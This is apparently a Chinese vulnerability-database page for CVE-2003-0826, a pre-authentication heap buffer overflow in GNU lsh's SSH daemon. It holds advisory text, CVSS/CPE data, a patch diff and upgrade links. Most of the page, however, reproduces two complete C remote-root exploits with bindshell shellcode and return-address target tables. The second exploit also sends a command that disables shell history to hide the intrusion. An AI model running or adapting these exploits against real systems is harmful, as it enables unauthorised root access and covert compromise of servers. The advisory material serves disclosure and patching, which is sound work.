CVE-2003-0826
CVSS7.5
发布时间 :2003-10-06 00:00:00
修订时间 :2016-10-17 22:37:41
NMCOES    

[原文]lsh daemon (lshd) does not properly return from certain functions in (1) read_line.c, (2) channel_commands.c, or (3) client_keyexchange.c when long input is provided, which could allow remote attackers to execute arbitrary code via a heap-based buffer overflow attack.


[CNNVD]LSH远程缓冲区溢出漏洞(CNNVD-200310-007)

        
        Lsh是一款GNU SSH协议实现。
        Lsh存在一个缓冲区溢出问题,远程攻击者可以利用这个漏洞以ROOT权限在系统上执行任意指令。
        问题存在于lsh使用的liboop库中,这个漏洞可以在验证之前发生,因此任何攻击者精心构建提交数据,可以以ROOT权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:gnu:lsh:1.4GNU lsh 1.4
cpe:/a:gnu:lsh:1.4.2GNU lsh 1.4.2
cpe:/a:gnu:lsh:1.4.1GNU lsh 1.4.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0826
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0826
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-007
(官方数据源) CNNVD

- 其它链接及资源

http://bugs.debian.org/211662
(UNKNOWN)  CONFIRM  http://bugs.debian.org/211662
http://lists.grok.org.uk/pipermail/full-disclosure/2003-September/010496.html
(UNKNOWN)  FULLDISC  20030919 lsh patch (was Re: [Full-Disclosure] new ssh exploit?)
http://lists.lysator.liu.se/pipermail/lsh-bugs/2003q3/000120.html
(UNKNOWN)  CONFIRM  http://lists.lysator.liu.se/pipermail/lsh-bugs/2003q3/000120.html
http://marc.info/?l=bugtraq&m=106398939512178&w=2
(UNKNOWN)  BUGTRAQ  20030919 Remote root vuln in lsh 1.4.x
http://marc.info/?l=bugtraq&m=106407188509874&w=2
(UNKNOWN)  BUGTRAQ  20030920 LSH: Buffer overrun and remote root compromise in lshd
http://www.debian.org/security/2005/dsa-717
(UNKNOWN)  DEBIAN  DSA-717

- 漏洞信息

LSH远程缓冲区溢出漏洞
高危 边界条件错误
2003-10-06 00:00:00 2005-10-20 00:00:00
远程  
        
        Lsh是一款GNU SSH协议实现。
        Lsh存在一个缓冲区溢出问题,远程攻击者可以利用这个漏洞以ROOT权限在系统上执行任意指令。
        问题存在于lsh使用的liboop库中,这个漏洞可以在验证之前发生,因此任何攻击者精心构建提交数据,可以以ROOT权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 临时补丁:
        --- src/read_line.c 16 Feb 2003 21:30:11 -0000 1.31
        +++ src/read_line.c 18 Sep 2003 20:02:48 -0000
        @@ -100,6 +100,7 @@
        /* Too long line */
        EXCEPTION_RAISE(self->e,
        make_protocol_exception(0, "Line too long."));
        + return available;
        }
        厂商补丁:
        GNU
        ---
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级程序:
        
        http://www.lysator.liu.se/~nisse/archive/lsh-1.4.3.tar.gz

        
        http://www.lysator.liu.se/~nisse/archive/lsh-1.4.2-1.4.3.diff.gz

        
        http://www.lysator.liu.se/~nisse/archive/lsh-1.5.3.tar.gz

         ftp://ftp.lysator.liu.se/pub/security/lsh/lsh-1.4.3.tar.gz
         ftp://ftp.lysator.liu.se/pub/security/lsh/lsh-1.4.2-1.4.3.diff.gz
         ftp://ftp.lysator.liu.se/pub/security/lsh/lsh-1.5.3.tar.gz

- 漏洞信息 (23161)

LSH 1.x Remote Buffer Overflow Vulnerability (1) (EDBID:23161)
linux remote
2003-09-19 Verified
0 Carl Livitt
N/A [点击下载]
source: http://www.securityfocus.com/bid/8655/info

lsh has been reported prone to a remote buffer overflow vulnerability. The condition is reported to present itself in fairly restrictive circumstances, and has been reported to be exploitable pre-authentication. Successful exploitation could result in the execution of arbitrary attacker supplied instructions in the context of the affected daemon. 

/*
  --------------------------------------
  Remote r00t exploit for lsh 1.4.x
  by Haggis aka Carl Livitt - carl.learningshophull@co@uk
  19/09/2003

  Latest version should always be available from
  http://doris.scriptkiddie.net
  ------------------------------------

  Spawns bindshell on port 12345 of remote host.

  Handily, it also bypasses non-exec stack protection as the
  shellcode is on the heap.

  NOTE: This exploit _only_ works if it's the first thing to
  connect to the lshd daemon after it has been started.
  Any other time, it is just a DoS. Run it a few times against
  a host running lshd to see what I mean.


  --------------------------------------------
  Determining RET address for a new platform:
  ------------------------------------------

  Start up 'lshd --daemonic', attach gdb to it and 'c'ontinue:

	sol:~ # rm /var/run/lshd.pid ; lshd --daemonic ; gdb -q lshd `pgrep lshd`
	Attaching to program: /usr/local/sbin/lshd, process 7140
	Reading symbols from /lib/libpam.so.0...done.
	Loaded symbols for /lib/libpam.so.0
	Reading symbols from /lib/libutil.so.1...done.
	Loaded symbols for /lib/libutil.so.1
	Reading symbols from /lib/libnsl.so.1...done.
	Loaded symbols for /lib/libnsl.so.1
	Reading symbols from /lib/libcrypt.so.1...done.
	Loaded symbols for /lib/libcrypt.so.1
	Reading symbols from /lib/libz.so.1...done.
	Loaded symbols for /lib/libz.so.1
	Reading symbols from /usr/local/lib/liboop.so.4...done.
	Loaded symbols for /usr/local/lib/liboop.so.4
	Reading symbols from /usr/lib/libgmp.so.3...done.
	Loaded symbols for /usr/lib/libgmp.so.3
	Reading symbols from /lib/libc.so.6...done.
	Loaded symbols for /lib/libc.so.6
	Reading symbols from /lib/libdl.so.2...done.
	Loaded symbols for /lib/libdl.so.2
	Reading symbols from /lib/ld-linux.so.2...done.
	Loaded symbols for /lib/ld-linux.so.2
	Reading symbols from /lib/libnss_files.so.2...done.
	Loaded symbols for /lib/libnss_files.so.2
	0x40157d37 in fork () from /lib/libc.so.6
	(gdb) c
	Continuing.

  Switch to another terminal, and run the exploit against the lsh
  server, specifying target number 3 (Test):

	haggis@sol:~/exploits/research/lsh> ./lsh_exploit -t localhost -T 3
	LSH 1.4.x (others?) exploit by Haggis (haggis@haggis.kicks-ass.net)

	[-] Building exploit buffer...
	[-] Sending exploit string...
	[-] Sleeping...
	[-] Connecting to bindshell...
	[*] Could not connect to localhost - the exploit failed

  Switch back to your other terminal. You will see:

	Program received signal SIGSEGV, Segmentation fault.
	0x41424344 in ?? ()


  Type 'x/1000x $eax':

	(gdb) x/1000x $eax

  And wait until you find lines similar to these:

	0x809fa68:      0x90909090      0x90909090      0x90909090      0x90909090
	0x809fa78:      0x90909090      0x90909090      0x90909090      0x90909090
	0x809faa8:      0x90909090      0x90909090      0x90909090      0x90909090
	0x809fa9c:      0x90909090      0x90909090      0x90909090      0x90909090
	^^^^^^^^^

  Any of the addresses that contains a NOP (0x90) can be used as your RET address.
  Create a new target in the source-code and Bob's-yer-uncle!
*/

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <time.h>
#include <stdarg.h>

#define SSH_PORT 22
#define BINDSHELL_PORT 12345
#define SIZ 8092
#define EXPLOIT_BUF_SIZE 4000 	// just approximate - works well enough
#define NOPS_LEN 1024

/*
 * Linux shellcode - binds /bin/sh to a port
 *
 * Claes M. Nyberg 20020620
 *
 * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
 */
char shellcode[]=
"\x83\xec\x10\x89\xe7\x31\xc0\x50\x50\x50\x66\x68\x30\x39\xb0\x02\x66\x50"
"\x89\xe6\x6a\x06\x6a\x01\x6a\x02\x89\xe1\x31\xdb\x43\x30\xe4\xb0\x66\xcd"
"\x80\x89\xc5\x6a\x10\x56\x55\x89\xe1\x43\x31\xc0\xb0\x66\xcd\x80\x50\x55"
"\x89\xe1\xb3\x04\xb0\x66\xcd\x80\xb0\x10\x50\x54\x57\x55\x89\xe1\xb3\x05"
"\xb0\x66\xcd\x80\x89\xc3\x31\xc9\x31\xc0\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd"
"\x80\x41\xb0\x3f\xcd\x80\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";

struct
{
	char *platform;
	unsigned long retAddr;
} targets[]= {
	{ "SuSE 8.1   - LSH v1.4.x (default)", 0x0809fb20},
	{ "RedHat 7.3 - LSH v1.4.x", 0x0809de90},
	{ "RedHat 8.0 - LSH v1.4.x", 0x0809a9d8},
	{ "Test. RET address = 0x41424344", 0x41424344},
	NULL
};

void my_send(int, char *, ...);
void my_recv(int);
int connect_to_host(int);
void my_sleep(int n);
int do_bind_shell();

struct hostent *hostStruct;
char buf[SIZ], host[SIZ]="\0";
int useTarget=0;
char usage[]=
"Usage: ./lsh_exploit -t host_name [-T platform_type]\n";

main(int argc, char **argv)
{
	int ch, i, targetSock;
	unsigned long *retPtr;
	char *charRetPtr;

	printf("LSH 1.4.x (others?) exploit by Haggis (haggis@haggis.kicks-ass.net)\n\n");
	while((ch=getopt(argc, argv, "t:T:h"))!=-1) {
		switch(ch) {
			case 't':
				strncpy(host, optarg, SIZ-1);
				break;
			case 'T':
				useTarget=atoi(optarg);
				break;
			case 'h':
			default:
				printf("%s\n",usage);
				printf("Available platforms:\n");
				for(i=0;targets[i].platform;i++)
					printf(" %2d. %s\n", i, targets[i].platform);
				printf("\n");
				exit(0);
				break;
		}
	}

	if(host[0]=='\0') {
		printf("[*] You must specify a host! Use -h for help\n");
		exit(1);
	}
	if((hostStruct=gethostbyname(host))==NULL) {
		printf("[*] Couldn't resolve host %s\nUse '%s -h' for help\n", host,argv[0]);
		exit(1);
	}
	if((targetSock=connect_to_host(SSH_PORT))==-1) {
		printf("[*] Coulnd't connect to host %s\n", host);
		exit(1);
	}
	my_recv(targetSock);

	printf("[-] Building exploit buffer...\n");

	retPtr=(unsigned long *)buf;
	for(i=0;i<EXPLOIT_BUF_SIZE/4;i++)
		*(retPtr++)=targets[useTarget].retAddr;

	charRetPtr=(unsigned char *)retPtr;
	for(i=0;i<NOPS_LEN-strlen(shellcode);i++)
		*(charRetPtr++)=(unsigned long)0x90;

	memcpy(charRetPtr, shellcode, strlen(shellcode));
	*(charRetPtr+strlen(shellcode))='\n';
	*(charRetPtr+strlen(shellcode)+1)='\0';

	printf("[-] Sending exploit string...\n");
	my_send(targetSock, buf);
	close(targetSock);

	printf("[-] Sleeping...\n");
	my_sleep(100000);

	printf("[-] Connecting to bindshell...\n");
	if(do_bind_shell()==-1)
		printf("[*] Could not connect to %s - the exploit failed\n", host);

	exit(0);
}

int do_bind_shell()
{
	fd_set rfds;
	int sock,retVal,r;

	if((sock=connect_to_host(BINDSHELL_PORT))==-1)
		return -1;

	printf("[-] Success!!! You should now be r00t on %s\n", host);
	do {
		FD_ZERO(&rfds);
		FD_SET(0, &rfds);
		FD_SET(sock, &rfds);
		retVal=select(sock+1, &rfds, NULL, NULL, NULL);
		if(retVal) {
			if(FD_ISSET(sock, &rfds)) {
				buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad!
				printf("%s", buf);
			}
			if(FD_ISSET(0, &rfds)) {
				buf[(r=read(0, buf, SIZ-1))]='\0'; // bad!
				send(sock, buf, strlen(buf), 0);
			}

		}
	} while(retVal && r); // loop until connection terminates

	close(sock);
	return 1;
}

// Given a port number, connects to an already resolved hostname...
// connects a TCP stream and returns a socket number (or returns error)
int connect_to_host(int p)
{
	int sock;
	struct sockaddr_in saddr;

	if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
		return -1;
	memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
	saddr.sin_family=AF_INET;
	saddr.sin_addr.s_addr=*((unsigned long *)hostStruct->h_addr_list[0]);
	saddr.sin_port=htons(p);
	if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
		close(sock);
		return -1;
	} else
	return sock;
}


// Handy little function to send formattable data down a socket.
void my_send(int s, char *b, ...)
{
	va_list ap;
	char *buf;

	va_start(ap,b);
	vasprintf(&buf,b,ap);
	send(s,buf,strlen(buf),0);
	va_end(ap);
	free(buf);
}


// Another handy function to read data from a socket.
void my_recv(int s)
{
	int len;
	char buf[SIZ];

	len=recv(s, buf, SIZ-1, 0);
	buf[len]=0;
}


// Wrapper for nanosleep()... just pass 'n' nanoseconds to it.
void my_sleep(int n)
{
	struct timespec t;
	t.tv_sec=0;
	t.tv_nsec=n;
	nanosleep(&t,&t);
}


		

- 漏洞信息 (23162)

LSH 1.x Remote Buffer Overflow Vulnerability (2) (EDBID:23162)
linux remote
2003-09-19 Verified
0 m00 security
N/A [点击下载]
source: http://www.securityfocus.com/bid/8655/info
 
lsh has been reported prone to a remote buffer overflow vulnerability. The condition is reported to present itself in fairly restrictive circumstances, and has been reported to be exploitable pre-authentication. Successful exploitation could result in the execution of arbitrary attacker supplied instructions in the context of the affected daemon. 

/* m00-lshd22.c
 *
 *  lshd 1.3-1.5 remote root exploit by m00 security // www.m00.ru
 *
 *  Binds shell on port 61200.
 *  Based on lsh_exploit.c by Haggis aka Carl Livitt // doris.scriptkiddie.net
 *
 *  Available targets:
 *    SuSE 8.1 - LSH v1.4 (heap)
 *    RedHat 7.3 - LSH v1.3.* (stack)
 *    RedHat 7.3 - LSH v1.4 (heap)
 *    RedHat 7.3 - LSH v1.4 (stack)
 *    RedHat 8.0 - LSH v1.4 (heap)
 *    RedHat 9.0 - LSH v1.4 (heap)
 *    RedHat 9.0 - LSH v1.4 (stack)
 *    Mandrake 9.0 - LSH v1.4 (stack)
 *    Mandrake 9.1 - LSH v1.3.* (heap)
 *    Mandrake 9.1 - LSH v1.3.* (heap)
 *    Mandrake 9.1 - LSH v1.3.* (stack)
 *    Mandrake 9.1 - LSH v1.4 (heap)
 *    Mandrake 9.1 - LSH v1.4 (stack)
 *    Mandrake 9.1 - LSH v1.5 (heap)
 *    Mandrake 9.1 - LSH v1.5 (stack)
 *
 *  Difference between heap and stack RET-addresses:
 *    Useing heap retaddr allows to bypass non-execute stack protection,
 *    but possibility of success exploitation is only about 30% :( cuz our
 *    data in heap doesn't have constant disposition.
 *    Stack r0cz ;D
 *
 *  Testing:
 *    sh-2.05b$ ./explshd localhost 12
 *
 *    lshd 1.3-1.5 remote root exploit by m00 security // www.m00.ru
 *
 *    [~] Connecting to localhost:22... OK
 *    [~] Waiting for lshd response...  OK
 *    => SSH-2.0-lshd_1.4.2 lsh - a free ssh
 *    [~] Building and sending exploit buffer... OK
 *    [~] Sleeping...
 *    [~] Trying to connect to bindshell... OK
 *    [+] Shell spawned! w00t!!!
 *
 *    uid=0(root) gid=0(root) groups=0(root)
 *    Linux localhost 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686 unknown unknown GNU/Linux
 *    20:29:44 up  2:29,  3 users,  load average: 0.04, 0.09, 0.11
 *
 *  Greets to:
 *    - nerF security team // www.nerf.ru
 *    - LimpidByte // lbyte.sysdrop.org
 *    - priv8security (especially to wsxz =)) // www.priv8security.com
 *    - UHAGr // www.uhagr.com
 *    - ech0 // x25.cc
 *    - ppl from EFnet@m00sec and #nerf
 *
 *  Authors:
 *    - Over_G // overg[at]mail.ru
 *    - d4rkgr3y // d4rk[at]securitylab.ru
 *
 *  Released 29/09/03 // www.m00.ru
*/

#include <string.h>
#include <unistd.h>
#include <netdb.h>


struct
{
	char *platform;
	unsigned long ret;
	int elen;
	int nlen;
}

targets[]=
{
	{ "SuSE 8.1 - LSH v1.4 (heap)", 0x0809f030, 1536, 1600},
	{ "RedHat 7.3 - LSH v1.3.* (stack)", 0xbffff07c, 876, 726}, // tested on 1.4.2 rpm
	{ "RedHat 7.3 - LSH v1.4 (heap)", 0x0809d620, 1536, 1600},
	{ "RedHat 7.3 - LSH v1.4 (stack)", 0xbfffc710, 876, 726}, // tested on 1.4.2 rpm
	{ "RedHat 8.0 - LSH v1.4 (heap)", 0x0809a9d8, 4000, 1024},
	{ "RedHat 9.0 - LSH v1.4 (heap)", 0x0809a0ee, 876, 726},
	{ "RedHat 9.0 - LSH v1.4 (stack)", 0xbfffc48c, 876, 726}, //  tested on 1.4.2 rpm
//	{ "Mandrake 8.2 - LSH v1.4 (stack)", 0x00000000, 0, 0}, // non-exploitable
	{ "Mandrake 9.0 - LSH v1.4 (stack)", 0xbfffc5b1, 876, 726}, // tested on 1.4.2 src
	{ "Mandrake 9.1 - LSH v1.3.* (heap)", 0x809bc90, 3500, 500},
	{ "Mandrake 9.1 - LSH v1.3.* (heap)", 0x809bc90, 3500, 500},
	{ "Mandrake 9.1 - LSH v1.3.* (stack)", 0xbffff07c, 3500, 500}, // tested on 1.3.2 rpm
	{ "Mandrake 9.1 - LSH v1.4 (heap)", 0x080a5660, 876, 726},
	{ "Mandrake 9.1 - LSH v1.4 (stack)", 0xbfffc5cc, 876, 726}, // tested on 1.4.2 src
	{ "Mandrake 9.1 - LSH v1.5 (heap)", 0x80a8540, 1536, 1600},
	{ "Mandrake 9.1 - LSH v1.5 (stack)", 0xbfffe1cc, 1536, 1600}, // tested on 1.5.57 rpm
	{ "Denial-of-Service attack", 0xdefaced, 3000, 500},
	NULL
};

// linux x86 shellcode by eSDee of Netric (www.netric.org)
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc1\x31\xc0\x31\xdb\x50\x50"
"\x50\x66\x68\xef\x10\xb3\x02\x66"
"\x53\x89\xe2\xb3\x10\x53\xb3\x02"
"\x52\x51\x89\xca\x89\xe1\xb0\x66"
"\xcd\x80\x31\xdb\x39\xc3\x74\x05"
"\x31\xc0\x40\xcd\x80\x31\xc0\x50"
"\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
"\x80\x89\xd7\x31\xc0\x31\xdb\x31"
"\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
"\x80\x31\xc0\x31\xdb\x50\x50\x57"
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
"\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
"\xcd\x80\x39\xc3\x75\x40\x31\xc0"
"\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
"\x31\xc9\x89\xf3\xb0\x3e\xfe\xc0\xcd\x80"
"\x31\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31"
"\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x8b\x54\x24"
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
"\x80\x31\xc0\x40\xcd\x80\x31\xc0"
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

struct hostent *hostSct;
char buf[0x7a69]="\0";

main(int argc, char **argv)
{
	int sock,ch,i,ss,targetSock;
	unsigned long *retPtr;
	char *charRetPtr;
	int port = 22;

	printf("\nlshd 1.3-1.5 remote root exploit by m00 security // www.m00.ru\n\n");
	if (argc < 3) {
		printf("Incorrect parameters. Usage: %s <target host> <target type> [port (22 default)]\n\nWhere 'target type' is:\n\n",argv[0]);
		for(i=0;targets[i].platform;i++) {
			printf("\r%i %s\n", i, targets[i].platform);
		}
		printf("\n");
		exit(0);
	} else {
		ss = atoi(argv[2]);
		if(argv[3]) { port = atoi(argv[3]); }
	}

	if((hostSct=gethostbyname(argv[1]))==NULL) {
		printf("[-] Couldn't resolve host %s\n", argv[1]);
		exit(1);
	}

	printf("[~] Connecting to %s:%i...", argv[1],port);
	if((targetSock=connect_to_host(port))==-1) {
		printf(" failed\n");
		exit(1);
	}
	printf(" OK\n");

	printf("[~] Waiting for lshd response... ");
	recv(targetSock, buf, 8095, 0);
	printf(" OK\n");

	printf("=> %s",buf);
	printf("[~] Building and sending exploit buffer...");
	retPtr=(unsigned long *)buf;
	for(i=0;i<targets[ss].elen;i++) {
		*(retPtr++) = targets[ss].ret; //RET
	}
	for(i=0;i<targets[ss].nlen;i++) {
		*(retPtr++)=(unsigned long)0x90909090;
	}
	charRetPtr=(unsigned char *)retPtr;
	memcpy(charRetPtr, shellcode, strlen(shellcode));
	*(charRetPtr+strlen(shellcode))='\n';
	send(targetSock,buf,strlen(buf),0);
	close(targetSock);

	printf(" OK\n[~] Sleeping...\n");
	sleep(1);
	printf("[~] Trying to connect to bindshell...");
	if((sock=connect_to_host(61200))==-1)
		printf(" error\n[-] Could not connect to %s:61200 - exploit failed\n\n", argv[1]);
	else {
		printf(" OK\n[+] Shell spawned! w00t!!!\n\n");
		send(sock,"export HISTFILE=/dev/null;id;uname -a;uptime;\n",46,0);
		get_shell(sock);
	}
	exit(0);
}


int get_shell(int sock)
{
	fd_set rfds;
	int retVal,r;

	do {
		FD_ZERO(&rfds);
		FD_SET(0, &rfds);
		FD_SET(sock, &rfds);
		retVal=select(sock+1, &rfds, NULL, NULL, NULL);
		if(retVal) {
			if(FD_ISSET(sock, &rfds)) {

				buf[(r=recv(sock, buf, 8095,0))]='\0';
				printf("%s", buf);
			}
			if(FD_ISSET(0, &rfds)) {
				buf[(r=read(0, buf, 8095))]='\0';
				send(sock, buf, strlen(buf), 0);
			}
		}
	} while(retVal && r);

	close(sock);
	return 1;
}

int connect_to_host(int port)
{
	int sockt;
	struct sockaddr_in saddr;

	if((sockt=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
		return -1;
	memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
	saddr.sin_family=AF_INET;
	saddr.sin_addr.s_addr=*((unsigned long *)hostSct->h_addr_list[0]);
	saddr.sin_port=htons(port);
	if(connect(sockt, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
		close(sockt);
		return -1;
	} else
	return sockt;
}
// m00000000000oooooooooooooooo

		

- 漏洞信息

11744
LSH Daemon lshd Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2003-09-20 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

LSH Remote Buffer Overflow Vulnerability
Boundary Condition Error 8655
Yes No
2003-09-19 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Carl Livitt.

- 受影响的程序版本

GNU lsh 1.5
GNU lsh 1.4.2
GNU lsh 1.4.1
GNU lsh 1.4
GNU lsh 1.3.5
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0

- 漏洞讨论

lsh has been reported prone to a remote buffer overflow vulnerability. The condition is reported to present itself in fairly restrictive circumstances, and has been reported to be exploitable pre-authentication. Successful exploitation could result in the execution of arbitrary attacker supplied instructions in the context of the affected daemon.

- 漏洞利用

The following proof of concept exploit has been supplied:

- 解决方案

SuSE has released advisory SuSE-SA:2003:041 to address this issue. See referenced advisory for fix information.

Debian has released advisory DSA 717-1 to address this issue. Please see the referenced advisory for further information on obtaining and applying fixes.


GNU lsh 1.3.5

GNU lsh 1.4.2

GNU lsh 1.5

Debian Linux 3.0 s/390

Debian Linux 3.0 arm

Debian Linux 3.0 alpha

Debian Linux 3.0 mips

Debian Linux 3.0 mipsel

Debian Linux 3.0 m68k

Debian Linux 3.0 sparc

Debian Linux 3.0 ppc

Debian Linux 3.0 hppa

Debian Linux 3.0

Debian Linux 3.0 ia-32

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站